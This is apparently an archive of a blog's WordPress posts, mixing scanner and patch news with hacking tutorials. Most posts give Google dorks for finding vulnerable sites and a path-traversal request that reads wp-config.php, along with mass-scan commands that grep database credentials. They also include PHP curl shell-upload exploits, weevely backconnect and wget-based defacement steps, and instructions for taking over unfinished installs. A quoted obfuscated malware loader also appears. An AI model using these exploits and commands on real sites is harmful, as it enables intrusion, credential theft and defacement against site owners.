Plecost: Wordpress Vulnerabilities Finder

There are a huge number of Wordpress around the world. Most of them are exposed to be attacked and be converted into a virus, malware or illegal porn provider, without the knowledge of the blog owner.
This project try to help sysadmins and blog's owners to make a bit secure their Wordpress.

Plecost is a vulnerability fingerprinting and vulnerability finder for Wordpress blog engine. 

What's new?

This Plecost 3 version, add a lot of new features and fixes, like:

• Fixed a lot of bugs.
• New engine: without threads or any dependencies, but run more faster. We'll used python 3 asyncio and non-blocking connections. Also consume less memory. Incredible, right? :)
• Changed CVE update system and storage: Now Plecost get vulnerabilities directly from NIST and create a local SQLite data base with filtered information for Wordpress and theirs plugins.
• Wordpress vulnerabilities: Now Plecost also manage Wordpress Vulnerabilities (not only for the Plugins).
• Add local vulnerability database are queryable. You can consult the vulnerabilities for a concrete wordpress or plugins without, using the local database.

Installation

Install Plecost is so easy:

$ python3 -m pip install plecost

Remember that Plecost3 only runs in Python 3.

Quick start

Scan a web site si so simple:

$ plecost http://SITE.com

A bit complex scan: increasing verbosity exporting results in JSON format and XML:
JSON

$ plecost -v http://SITE.com -o results.json

XML

$ plecost -v http://SITE.com -o results.xml

Example :

 Download and read more at:

Read more

by Malik korrich ~ mardi 2 juin 2015 0 commentaires

WordPress Patched Zero Day XSS Vulnerability With New 4.2.1 Security Release

WordPress Patched Zero Day XSS Vulnerability With New 4.2.1 Security Release.

WordPress 4.2.1 version is now available. This is a critical security release for all previous versions and we strongly encourage you to update your sites immediately.

A few hours ago, the WordPress team was made aware of a cross-site scripting vulnerability, which could enable commenters to compromise a site. The vulnerability was discovered by Jouko Pynnönen.

WordPress 4.2.1 has begun to roll out as an automatic background update, for sites that support those.

For more information, see the release notes or consult the list of changes.

Download WordPress 4.2.1 or venture over to Dashboard → Updates and simply click “Update Now”.

What is Cross Site Scripting (XSS)?
'XSS' also known as 'CSS' - Cross Site Scripting. It is a very common vulnerability
found in Web Applications, 'XSS' allows the attacker to INSERT malicous code, There are many types of XSS attacks.

Read more here about Cross Site Scripting with Example.

WordPress clients can likewise briefly disable remarks meanwhile until the patch has been issued by the WordPress security group.

Source: Wordpress

Read more

by Malik korrich ~ lundi 27 avril 2015 0 commentaires

Exploring Wordpress Theme Arbitrary File Download Vulnerability Exploits Available

Exploring Wordpress Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification

Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143

-------------------------------------------------------------------------------------------

Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142

-------------------------------------------------------------------------------------------

Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144

-------------------------------------------------------------------------------------------

All themes above, are failing in the same revslider plugin.

POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

Exploit developed can check about 20 themes, and allows check standard as follows.

POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Which is the same as 0day mentioned above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php

Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction --comand

--comand-vul Every vulnerable URL found will execute this command parameters.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'

 --comand-all Use this commmand to specify a single command to EVERY URL found.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'

    Observation:
    _TARGET_ will be replaced by the URL/target found, although if the user
    doesn't input the get, only the domain will be executed.
   _TARGETFULL_ will be replaced by the original URL / target found.

-------------------------------------------------------------------------------------------

INURLBR ADVANCED CONTROL

php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'

[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR

[TUTORIAL] - Hacking Panel Wordpress - Slider Revolution

[TUTORIAL] - Getting access to the Wordpress panel

Source: Inurl

Read more

by Malik korrich ~ mercredi 21 janvier 2015 0 commentaires

100’s of Thousands Wordpress Sites infected with Dangerous Malware

About 100,000 or more websites running the WordPress content management system have been compromised by mysterious malware that turns the infected sites into attack platforms that can target visitors, security researchers said.

source sucuri

The campaign has prompted Google to flag more than 11,000 domains as malicious, but many more sites have been detected as compromised, according to a blog post published Sunday by Sucuri, a firm that helps website operators secure their servers. Researchers have yet to confirm the cause of the infection, but they suspect it's related to a vulnerability in Slider Revolution, a WordPress plugin, that was disclosed in early September.


The in-the-wild attack observed by Sucuri causes infected sites to load highly obfuscated attack code on every webpage that looks like this:

eval(decodeURIComponent
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Source sucuri

The code causes pages to download the malicious payload from hxxp://soaksoak.ru/xteas/code. Judging from some of the reader comments, some administrators were surprised to find that the sites they oversee were infected. Sucuri's free site check scanner will detect sites that are actively compromised. Disinfection involves removing malicious code added to a script located at wp-includes/template-loader.php. WordPress admins who use the Slider Revolution plugin should also ensure it's up to date.

Read Full Article on arstechnica

Read more

by Malik korrich ~ lundi 15 décembre 2014 0 commentaires

Exploit Wordpress: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass

Uploading Shell

Requirement:
    1-Python Any Version (v2.7 recommended)
    2-Exploit Script
    3-Backdoor

Steps:
    1- Download Exploit

        wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt

    2- Change to executable Python extension

        mv wpdatatables_shell_up.py_.txt wpdatatables_shell_up.py

    3- Find Vulnerable Target using dork

        inurl:/plugins/wpdatatables
        inurl:codecanyon-3958969
        index of "wpdatatables"
        index of "codecanyon-3958969"

    4- Open cmd/terminal and run exploit wptable.py

        python wpdatatables_shell_up.py -t targetsite.com -f shell.php

    5- Shell Upload to

        http://targetsite.com/wp-content/YEAR/MONTH/shell.php

Bypassing Not Acceptable

Requirements:
    1- Weevely Stealth Shell
    2- Remote Deface Script (.txt)


Steps:
    1- Upload weevely stealth shell using the exploit script

    2- Backconnect using weevely

    3- CD to root directory

    4- Backup index.php

        mv index.php indexBAK.php

    5- Import Deface Script

        wget http://yourhosting.com/index.txt -O index.php

Read more

by Malik korrich ~ lundi 24 novembre 2014 0 commentaires

WordPress 4.0.1 Released to Address Vulnerabilities and Cross-Site Scripting Flaw

The critical security release addresses a serious cross-site scripting (XSS) bug identified and reported by Jouko Pynnonen of the Finland-based IT company Klikki Oy on September 26. The vulnerability affects WordPress 3.9.2 and earlier versions which, according to the latest statistics from WordPress, account for nearly 86% of installations. WordPress 4.0, released in early September 2014, is not affected. 

"An attacker could exploit the vulnerability by entering carefully crafted comments, containing program code, on WordPress blog posts and pages. Under default settings comments can be entered by anyone without authentication (login)," Klikki Oy said in a press release. "Program code injected in comments would be inadvertently executed in the blog administrator's web browser when they view the comment. The rogue code could then perform administrative operations by covertly taking over the administered account."

A proof-of-concept published by the company shows that an attacker can exploit the vulnerability to create new administrator accounts, change the password of the current administrator, and execute arbitrary PHP code on the server.

"Exploitability without login, under default settings, and the server-side impact make this probably the most serious WordPress core vulnerability that has been reported since 2009," Klikki Oy said.

Technical details on the critical XSS vulnerability are available in an advisory published by the Finnish company on November 20.

Millions of WordPress sites around the web are being updated to 4.0.1 right now and older releases will be updated to 3.9.3, 3.8.5, or 3.7.5, as outlined in Andrew Nacin’s security release announcement. If you don’t want to wait for the automatic update, you can always go to Dashboard → Updates in the admin and update immediately.

The security update also fixes 23 flaws from the WordPress 4.0 version among others.

Read Full article at SECURITYWEEK

Read more

by Malik korrich ~ dimanche 23 novembre 2014 0 commentaires

Exploit WordPress: Wp-Install

 
Dorks:

 inurl:/wp-admin/install.php

 inurl:/wp-admin/install.php & intext:welcome -github -code

How to Exploit?

1. Firstly, as usual, copy and paste one of the dorks given on google.
2. Choose any site
3. If your target is http://www.example.com/wp-admin/install.php , and the webpage show as the picture below, thats mean the site might be vulnerable.
   
   
   
   
   
     
4. But, if the webpage show like the picture below, it means the site is not vulnerable.
   
5. Fill in the Site Title,Username, Passwords, and your Email Address and click Install Wordpress
6. If the installation succeed, you can login into the admin panel.
7. Else, you will get error message as below,
   
   You may also like: HOW TO UPLOAD SHELL IN WORDPRESS SITES

Read more

by Malik korrich ~ vendredi 17 octobre 2014 0 commentaires

Wordpress 0day Exploiter [Original]

Wordpress 0day Exploiter
Wordpress 0day Exploiter is a tool that enable you to register as new admin on a wordpress site which have the bug on the Ajax.php file.

 How to create dorks?
It's very easy so create the dorks, the list of vulnerable themes are already provided on the right richtext box. So, you just need to add the theme name.

Dork:

inurl:/wp-content/themes/[theme_name]

Example:

inurl:/wp-content/themes/appius

How to use the tools?
It's easy, once you have found your target, 

1- Simply paste the site URL,theme name, an your email in the textbox

2- Click on Confirm > Exploit

3- If your target is vulnerable, the "Register" button will be enabled

4- Click on Register and the webbrowser will bring you to the registration page

5- Enter your username and email

6- Check your email inbox for the confirmation and the password for your account.

7- Login to the site and there you go :)

8- You also can upload shell into the site. [How to upload shell in Wordpress site] 

  Download / Mirror

Read more

by Malik korrich ~ lundi 29 septembre 2014 0 commentaires

Creating an iOS Application Using Wordpress

With a whole lot of room for incessant innovation in Wordpress, the web development community is consistently striving to make WP spread its wings further.

And this is where the concept of using Wordpress to create mobile apps comes into existence. Yes, there are plugins and granted, they are great, but if you are willing to compromise control and let the third party tools dictate terms, you might as well go ahead with the likes of AppPresser and Mobiloud. 

 

But, when being in the driver's seat is on your agenda, segue on to the following partially plugin-assisted ways to create iOS apps using Wordpress:

Build a Web Application Theme that Stays True to the Most Basic Strictures

 

There is a standard conceptualization (or should I say conceptual standardization?) of mobile apps – a mobile app is the one that runs and appears great on a mobile device. Though, this hardly covers the native app concepts that exist at the very fibre of mobile apps of all sorts. 

 

What needs to be clearly understood is whether the guy who is buying your app to sell it to his customers considers the standard web app as the iOS app he is expecting you to roll out. If that indeed is the case, you have your task cut out (it hardly is a task) – just code a theme that will let your content be displayed on a Smartphone screen in a manner most clean and clutter-free. 

 

OR, you can use PhoneGap with technologies like CSS, JavaScript and HTML to create a shell application. Accompanying it, you will need a browser that shouldn't display an address bar and something that leads to the app you have created. The final app you have through this method may not be something you would be immensely proud of, but you have just created your first mobile app using few web technologies, that alone is worth the price of admission. However, if that doesn't please you enough, there are more ways to follow:

Wordpress Will Collect Data for You. Now Input the Same to an App Generator

 

Here is how it goes like:

To begin with, you create a custom posts on the Wordpress CMS. The custom fields are then to be placed to where they belong. You can then move on to creating a custom plugin that would lend a sense of structure to the whole setup of data. And then, the app generators come into play. Using these app generators, you have the wherewithal to compile the apps with their own compilers. The data from Wordpress can then be fed using the URLs – which can either be done using plugins or via the Wordpress XML-RPC - and creating apps becomes a task much feasible following that.

Wordpress Will Collect Data for You. Now, Create the iPad side of things Natively

 

Well, if you don't have a whole lot of idea about this one, you have the option of branching out to a development company that has the expertise to blend the Wordpress strategy with the mobile technology in the most seamless and effective fashion and thus create exceptional native apps. 

 

All said and done, there are a bunch of things that ned to be off the deck before you swing-start the development process. Coalescing data from the Wordpress URLs has to be done in a precise manner you must be appropriately equipped to handle the responses. The UI operations also have to be handled with utmost care and not to mention, do steer clear of all the possible oversights.

Author:

Sarah Parker is a veteran tech savvy content writer associated with Designs2Html Ltd, where you can opt for PSD to Wordpress conversion services. Also, in case of availing PSD to Magento Theme Conversion services, you can get in touch with her.

Read more

by Malik korrich ~ vendredi 22 août 2014 0 commentaires

WordPress zarzadzanie_kontem Plugin

Dork:

inurl:"/wp-content/plugins/zarzadzanie_kontem/"

Live Demo:

http://kursrekodziela.pl/images/user-images/front-end/guest/2014/07/NEXUS.txt

NEXUS - Sharing Is Caring

Read more

by Malik korrich ~ vendredi 4 juillet 2014 0 commentaires

Exploit Wordpress: Echea Theme - File Upload Vulnerability

Dork: inurl:/wp-content/themes/echea/

Shell Uploaded to: 
http://www.site.com/wp-content/themes/echea/js/cufon-fonts/uploaded/custom_shell.php.jpg 

Exploit:

$uploadfile="shell.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/themes/echea/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?> 

This exploit is the same as my previous post, so check it! :P

Read more

by Malik korrich ~ jeudi 15 mai 2014 0 commentaires

Exploit Wordpress:Complete Gallery Manager 3.3.3 - File Upload Vulnerability

Things Required:
-XAMPP
-Shell
-Exploit script.php

Dork: inurl/wp-content/plugins/complete-gallery-manager
Shell Uploaded to : http://wordpress.com/wp-content/2013/09/up.php

Exploit :

$uploadfile="up.php";
$ch =
curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Just watch the video if you still don't understand :)

 

Read more

by Malik korrich ~ 0 commentaires

Exploit Wordpress: Salespresspro Theme - File Upload Vulnerability

POC:
Dork: inurl:/themes/salespresspro
          inurl:/wp-content/themes/salespresspro/

Exploit: /wp-content/themes/salespresspro/headerimgbgblog-upload.php  

This exploit is the same as the previous exploit that i posted, please check them if you can't understand.

  

Read more

by Malik korrich ~ 0 commentaires